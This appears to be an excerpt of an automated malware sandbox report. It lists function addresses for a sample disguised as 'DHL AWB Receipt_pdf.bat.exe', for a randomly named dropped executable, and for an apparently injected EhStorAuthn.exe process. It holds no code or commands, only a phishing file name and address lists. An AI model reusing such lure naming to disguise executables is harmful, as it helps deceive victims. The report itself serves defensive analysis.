Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_004102C3	4_2_004102C3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0040E299	4_2_0040E299
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0040E2A3	4_2_0040E2A3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0040E3F2	4_2_0040E3F2
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0040E3F3	4_2_0040E3F3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_00401B83	4_2_00401B83
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_00401B90	4_2_00401B90
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0040E43C	4_2_0040E43C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0042ED43	4_2_0042ED43
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0040E606	4_2_0040E606
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_004026E0	4_2_004026E0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_00402FD5	4_2_00402FD5
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_00402FE0	4_2_00402FE0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01478158	4_2_01478158
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E0100	4_2_013E0100
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148A118	4_2_0148A118
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A81CC	4_2_014A81CC
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014B01AA	4_2_014B01AA
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A41A2	4_2_014A41A2
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01482000	4_2_01482000
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AA352	4_2_014AA352
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014B03E6	4_2_014B03E6
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FE3F0	4_2_013FE3F0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01490274	4_2_01490274
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014702C0	4_2_014702C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0535	4_2_013F0535
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014B0591	4_2_014B0591
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A2446	4_2_014A2446
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01494420	4_2_01494420
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0149E4F6	4_2_0149E4F6
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01414750	4_2_01414750
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0770	4_2_013F0770
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EC7C0	4_2_013EC7C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140C6E0	4_2_0140C6E0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01406962	4_2_01406962
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F29A0	4_2_013F29A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014BA9A6	4_2_014BA9A6
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FA840	4_2_013FA840
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F2840	4_2_013F2840
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013D68B8	4_2_013D68B8
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141E8F0	4_2_0141E8F0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AAB40	4_2_014AAB40
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A6BD7	4_2_014A6BD7
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EEA80	4_2_013EEA80
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FAD00	4_2_013FAD00
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148CD1F	4_2_0148CD1F
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EADE0	4_2_013EADE0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01408DBF	4_2_01408DBF
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0C00	4_2_013F0C00
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E0CF2	4_2_013E0CF2
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01490CB5	4_2_01490CB5
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01464F40	4_2_01464F40
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01432F28	4_2_01432F28
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01410F30	4_2_01410F30
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01492F30	4_2_01492F30
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FCFE0	4_2_013FCFE0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146EFA0	4_2_0146EFA0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E2FC8	4_2_013E2FC8
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0E59	4_2_013F0E59
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AEE26	4_2_014AEE26
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AEEDB	4_2_014AEEDB
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01402E90	4_2_01402E90
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014ACE93	4_2_014ACE93
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014BB16B	4_2_014BB16B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0142516C	4_2_0142516C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DF172	4_2_013DF172
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FB1B0	4_2_013FB1B0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0149F0CC	4_2_0149F0CC
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A70E9	4_2_014A70E9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AF0E0	4_2_014AF0E0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F70C0	4_2_013F70C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A132D	4_2_014A132D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DD34C	4_2_013DD34C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0143739A	4_2_0143739A
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140B2C0	4_2_0140B2C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F52A0	4_2_013F52A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014912ED	4_2_014912ED
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A7571	4_2_014A7571
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148D5B0	4_2_0148D5B0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E1460	4_2_013E1460
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AF43F	4_2_014AF43F
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AF7B0	4_2_014AF7B0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A16CC	4_2_014A16CC
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140B950	4_2_0140B950
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01485910	4_2_01485910
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F9950	4_2_013F9950
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145D800	4_2_0145D800
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F38E0	4_2_013F38E0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AFB76	4_2_014AFB76
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01465BF0	4_2_01465BF0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0142DBF9	4_2_0142DBF9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140FB80	4_2_0140FB80
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AFA49	4_2_014AFA49
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A7A46	4_2_014A7A46
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01463A6C	4_2_01463A6C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0149DAC6	4_2_0149DAC6
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01435AA0	4_2_01435AA0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148DAAC	4_2_0148DAAC
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01491AA3	4_2_01491AA3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A1D5A	4_2_014A1D5A
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A7D73	4_2_014A7D73
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F3D40	4_2_013F3D40
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140FDC0	4_2_0140FDC0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01469C32	4_2_01469C32
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AFCF2	4_2_014AFCF2
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AFF09	4_2_014AFF09
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F1F92	4_2_013F1F92
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013B3FD2	4_2_013B3FD2
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013B3FD5	4_2_013B3FD5
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AFFB1	4_2_014AFFB1
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F9EB0	4_2_013F9EB0
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_03822380	5_2_03822380
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_03822381	5_2_03822381
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_038223CA	5_2_038223CA
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_03822227	5_2_03822227
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_03822231	5_2_03822231
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_03824251	5_2_03824251
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_0382A9AC	5_2_0382A9AC
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_0382A9B1	5_2_0382A9B1
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_03824028	5_2_03824028
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_03824031	5_2_03824031
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_03842CD1	5_2_03842CD1
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E2E4F6	6_2_04E2E4F6
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E32446	6_2_04E32446
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E24420	6_2_04E24420
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E40591	6_2_04E40591
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D80535	6_2_04D80535
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D9C6E0	6_2_04D9C6E0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D7C7C0	6_2_04D7C7C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DA4750	6_2_04DA4750
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D80770	6_2_04D80770
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E12000	6_2_04E12000
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E381CC	6_2_04E381CC
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E401AA	6_2_04E401AA
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E08158	6_2_04E08158
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D70100	6_2_04D70100
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E1A118	6_2_04E1A118
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E002C0	6_2_04E002C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E20274	6_2_04E20274
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E403E6	6_2_04E403E6
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D8E3F0	6_2_04D8E3F0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E3A352	6_2_04E3A352
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D70CF2	6_2_04D70CF2
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E20CB5	6_2_04E20CB5
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D80C00	6_2_04D80C00
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D7ADE0	6_2_04D7ADE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D98DBF	6_2_04D98DBF
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D8AD00	6_2_04D8AD00
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E1CD1F	6_2_04E1CD1F
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E3EEDB	6_2_04E3EEDB
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D92E90	6_2_04D92E90
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E3CE93	6_2_04E3CE93
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D80E59	6_2_04D80E59
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E3EE26	6_2_04E3EE26
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D72FC8	6_2_04D72FC8
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D8CFE0	6_2_04D8CFE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DFEFA0	6_2_04DFEFA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DF4F40	6_2_04DF4F40
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E22F30	6_2_04E22F30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DA0F30	6_2_04DA0F30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DC2F28	6_2_04DC2F28
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DAE8F0	6_2_04DAE8F0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D668B8	6_2_04D668B8
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D8A840	6_2_04D8A840
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D82840	6_2_04D82840
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E4A9A6	6_2_04E4A9A6
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D829A0	6_2_04D829A0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D96962	6_2_04D96962
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D7EA80	6_2_04D7EA80
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E36BD7	6_2_04E36BD7
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E3AB40	6_2_04E3AB40
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D71460	6_2_04D71460
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E3F43F	6_2_04E3F43F
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E1D5B0	6_2_04E1D5B0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E37571	6_2_04E37571
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E316CC	6_2_04E316CC
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E3F7B0	6_2_04E3F7B0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E3F0E0	6_2_04E3F0E0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E370E9	6_2_04E370E9
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D870C0	6_2_04D870C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E2F0CC	6_2_04E2F0CC
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D8B1B0	6_2_04D8B1B0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E4B16B	6_2_04E4B16B
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D6F172	6_2_04D6F172
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB516C	6_2_04DB516C
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E212ED	6_2_04E212ED
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D9B2C0	6_2_04D9B2C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D852A0	6_2_04D852A0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DC739A	6_2_04DC739A
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D6D34C	6_2_04D6D34C
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E3132D	6_2_04E3132D
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E3FCF2	6_2_04E3FCF2
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DF9C32	6_2_04DF9C32
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D9FDC0	6_2_04D9FDC0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E37D73	6_2_04E37D73
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D83D40	6_2_04D83D40
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E31D5A	6_2_04E31D5A
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D89EB0	6_2_04D89EB0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D81F92	6_2_04D81F92
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E3FFB1	6_2_04E3FFB1
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E3FF09	6_2_04E3FF09
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D838E0	6_2_04D838E0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DED800	6_2_04DED800
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D89950	6_2_04D89950
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D9B950	6_2_04D9B950
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E15910	6_2_04E15910
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E2DAC6	6_2_04E2DAC6
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E21AA3	6_2_04E21AA3
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E1DAAC	6_2_04E1DAAC
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DC5AA0	6_2_04DC5AA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E37A46	6_2_04E37A46
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E3FA49	6_2_04E3FA49
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DF3A6C	6_2_04DF3A6C
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DBDBF9	6_2_04DBDBF9
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DF5BF0	6_2_04DF5BF0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D9FB80	6_2_04D9FB80
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04E3FB76	6_2_04E3FB76
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CC1F50	6_2_02CC1F50
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CBCE40	6_2_02CBCE40
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CBCE37	6_2_02CBCE37
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CBB3A3	6_2_02CBB3A3
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CBB040	6_2_02CBB040
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CBD060	6_2_02CBD060
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CBB036	6_2_02CBB036
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CBB1D9	6_2_02CBB1D9
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CBB18F	6_2_02CBB18F
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CBB190	6_2_02CBB190
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CC37C0	6_2_02CC37C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CC37BB	6_2_02CC37BB
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CC55C0	6_2_02CC55C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CDBAE0	6_2_02CDBAE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04BAE6C0	6_2_04BAE6C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04BAD788	6_2_04BAD788
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04BAE204	6_2_04BAE204
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04BAE323	6_2_04BAE323
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04BAC9F9	6_2_04BAC9F9
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04BACA38	6_2_04BACA38

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: String function: 01425130 appears 58 times
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: String function: 0146F290 appears 105 times
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: String function: 01437E54 appears 102 times
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: String function: 013DB970 appears 280 times
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: String function: 0145EA12 appears 86 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: String function: 04DEEA12 appears 86 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: String function: 04DFF290 appears 105 times
